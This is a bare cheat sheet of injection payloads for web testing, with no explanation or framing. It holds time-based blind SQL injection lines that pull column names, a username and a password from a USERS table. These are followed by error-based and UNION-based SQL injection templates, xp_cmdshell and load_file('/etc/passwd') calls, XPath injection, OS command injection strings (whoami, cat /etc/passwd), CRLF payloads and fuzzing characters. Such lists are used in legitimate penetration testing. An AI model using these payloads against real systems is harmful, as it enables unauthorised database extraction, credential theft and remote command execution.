1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)   
1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER')=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),1,1)))=112) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),2,1)))=97) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),3,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),4,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>,'PASS')=2) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'PASS'),1,1)))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'PASS'),2,1)))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)	
1; IF (LEN(SELECT TOP 1 USER from USERS)=5) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),1,1))=97) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),2,1))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),3,1))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),4,1))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),5,1))=110) WAITFOR DELAY '00:00:10'--  (+10 seconds)	
1; IF (LEN(SELECT TOP 1 PASS from USERS)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),1,1))=49) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),2,1))=50) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),3,1))=51) WAITFOR DELAY '00:00:10'--  (+10 seconds)	
1; IF (LEN(SELECT TOP 1 ID  from USERS)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),1,1))=49) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),2,1))=48) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),3,1))=48) WAITFOR DELAY '00:00:10'--  (+10 seconds)	   
1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USERS desc)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),2,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)	
1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USERS desc)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),2,1)))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),3,1)))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1 having 1=1--
x' having 1=1--	 
1 or 1=convert(int,(USER))--	 
1 or 1=convert(int,(DB_NAME))--	 
1 or 1=convert(int,(@@VERSION))--	 
1 or 1=convert(int,(@@SERVERNAME))--	
1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--	 
1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-1'))--	
1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-2'))--	
1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--	 
1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))--
1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))--  
1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))-- 	
1  or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1))--	
1  or 1=convert(int,(select top 1 COLUMN-NAME-3 from TABLE-NAME-1))--	 
1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))--	 
1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-2-VALUE') order by COLUMN-NAME-1 desc))-- having 1=1--
x' having 1=1--	 
or 1=convert(int,(USER))--	 
or 1=convert(int,(DB_NAME))--	 
or 1=convert(int,(@@VERSION))--	 
or 1=convert(int,(@@SERVERNAME))--	
or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--	 
or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-1'))--	
or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-2'))--	
or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--	 
or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))--
or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))--  
or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))-- 	
or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1))--	
or 1=convert(int,(select top 1 COLUMN-NAME-3 from TABLE-NAME-1))--	 
or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))--	 
or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-2-VALUE') order by COLUMN-NAME-1 desc))--
' having 1=1--	 
' or 1=convert(int,(USER))--	 
' or 1=convert(int,(DB_NAME))--	 
' or 1=convert(int,(@@VERSION))--	 
' or 1=convert(int,(@@SERVERNAME))--	
'  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--	 
'  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-1'))--	
'  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-2'))--	
'  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--	 
'  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))--
'  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))--  
'  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))-- 	
'  or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1))--	
'  or 1=convert(int,(select top 1 COLUMN-NAME-3 from TABLE-NAME-1))--	 
'  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))--	 
'  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-2-VALUE') order by COLUMN-NAME-1 desc))--
' UNION SELECT ALL 1--
' UNION SELECT ALL 1,2--
' UNION SELECT ALL 1,2,3--
' UNION SELECT ALL 1,2,3,4--	 
' UNION SELECT ALL 1,USER,3,4--	 
' UNION SELECT ALL 1,DB_NAME,3,4--	 
' UNION SELECT ALL 1,@@VERSION,3,4--	 
' UNION SELECT ALL 1,@@SERVERNAME,3,4--	
'  UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--	
'  UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--	  
'  UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--	
'  UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1-- 	
'  UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--
UNION SELECT ALL 1--
UNION SELECT ALL 1,2--
UNION SELECT ALL 1,2,3--
UNION SELECT ALL 1,2,3,4--	 
UNION SELECT ALL 1,USER,3,4--	 
UNION SELECT ALL 1,DB_NAME,3,4--	 
UNION SELECT ALL 1,@@VERSION,3,4--	 
UNION SELECT ALL 1,@@SERVERNAME,3,4--	
UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--	
UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--	  
UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--	
UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1-- 	
UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--
1 UNION SELECT ALL 1--
1 UNION SELECT ALL 1,2--
1 UNION SELECT ALL 1,2,3--
1 UNION SELECT ALL 1,2,3,4--	 
1 UNION SELECT ALL 1,USER,3,4--	 
1 UNION SELECT ALL 1,DB_NAME,3,4--	 
1 UNION SELECT ALL 1,@@VERSION,3,4--	 
1 UNION SELECT ALL 1,@@SERVERNAME,3,4--	
1  UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--	
1  UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--	  
1  UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--	
1  UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1-- 	
1  UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--
ASCII(‘A’)
SUBSTR(‘ABCDE’,2,3)
SUBSTRING(‘ABCDE’,2,3)
Select Sys.login_user from dual SELECT user FROM dual SYS_CONTEXT(‘USERENV’,‘SESSION_USER’)
select suser_sname()
SELECT user()
Utl_Http.request(‘http://madeupserver.com’)
waitfor delay ‘0:0:10’ exec master..xp_cmdshell ‘ping localhost’
sleep(100)
select banner from v$version
select @@version
SELECT SYS_CONTEXT(‘USERENV’,’DB_NAME’) FROM dual
SELECT db_name()
SELECT @@servername
SELECT database()
SELECT privilege FROM session_privs
SELECT grantee, table_name, privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES
SELECT * FROM information_schema.user_privileges WHERE grantee = ‘[user]’ where [user] is determined from the output of SELECT user()
Select table_name||’‘||column_name from all_tab_columns
SELECT table_name+’‘+column_name from information_schema.columns
SELECT CONCAT(table_name,‘,column_name) from information_schema.columns
SELECT object_name, object_type FROM user_objects
SELECT name FROM sysobjects
SELECT table_name FROM information_schema.tables (or trigger_name from information_schema.triggers, etc.)
SELECT object_name, object_type FROM user_objects WHERE object_type=’TABLE’
SELECT table_name FROM all_tables
SELECT name FROM sysobjects WHERE xtype=’U’
SELECT table_name FROM information_schema. tables where table_type=’BASE TABLE’ and table_schema!=’mysql’
SELECT column_name, name FROM user_tab_columns WHERE table_name = ‘%’
SELECT column_name, name FROM ALL_tab_columns WHERE table_name = ‘%’
SELECT column_name FROM information_schema.columns WHERE table_name=’%’
EXEC xp_cmshell ‘dir c:\ ‘
SELECT load_file(‘/etc/passwd’)
a’ || 1==1 || ‘a’==’a
‘ or count(parent::*[position()=1])=0 or ‘a’=’b
‘ or count(parent::*[position()=1])>0 or ‘a’=’b
1 or count(parent::*[position()=1])=0
1 or count(parent::*[position()=1])>0
substring(name(parent::*[position()=1]),1,1)=’a’
substring(//parentnodename[position()=1]/child::node()[position()=1]/text(),1,1)=’a’
;%20echo%20file_get_contents(‘/etc/passwd’)
;%20system(‘cat%20/etc/passwd’)
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
| ping –i 30 127.0.0.1 |
| ping –n 30 127.0.0.1 |
& ping –i 30 127.0.0.1 &
& ping –n 30 127.0.0.1 &
; ping 127.0.0.1 ;
%0a ping –i 30 127.0.0.1 %0a
` ping 127.0.0.1 `
| whoami ; x || whoami &
| whoami |
& whoami &
; whoami ;
%0a whoami %0a
` whoami `
;echo%20111111
echo%20111111
response.write%20111111
:response.write%20111111
phpinfo()
system(‘ping%20127.0.0.1’)
ARRAY(0x9886454)
['aaaa','bbbb']
foo%00%0d%0abar
foo%250d%250abar
foo%%0d0d%%0a0abar
-1’+union+select+1,2,3,4,5,6,VERSION(),8;–+
1’+union+select+1,2,3,4,5,6,VERSION(),8;–+
')
'))
')) AND 3789=3789 AND (('xkii'='xkii
')))')) AND 3789=3789 AND (('xkii'='xkii
')))
'))))
') AND 3789=3789 AND (('xkii'='xkii
' AND 3789=3789 AND (('xkii'='xkii
')); WAITFOR DELAY '0:0:5';--
');
'));
')); WAITFOR DELAY '0:0:5';--
')));')) WAITFOR DELAY '0:0:5';--
')));
'))));
'); WAITFOR DELAY '0:0:5';--
' WAITFOR DELAY '0:0:5';--
'; WAITFOR DELAY '0:0:5';--
`
´
'
’
‘
‚
“
”
„
…
‹
‰
›
¦
«
¬
°
·
»
"
'
;
:
<
>
(
)
=
-
--
==
("
('
(;
<"
<'
<;
);
)'
)"
)--
)==
":
";
"'
">
'>
';
==;
=='
==--
==:
=="
-
-'
-"
-;
-:
-==
-">
-->
--)
--;
--'
--"
(--
(--'
(--"
(--;
)--('
)--(
)--("
)--(;
/
//
//*
/'
//"
//*;
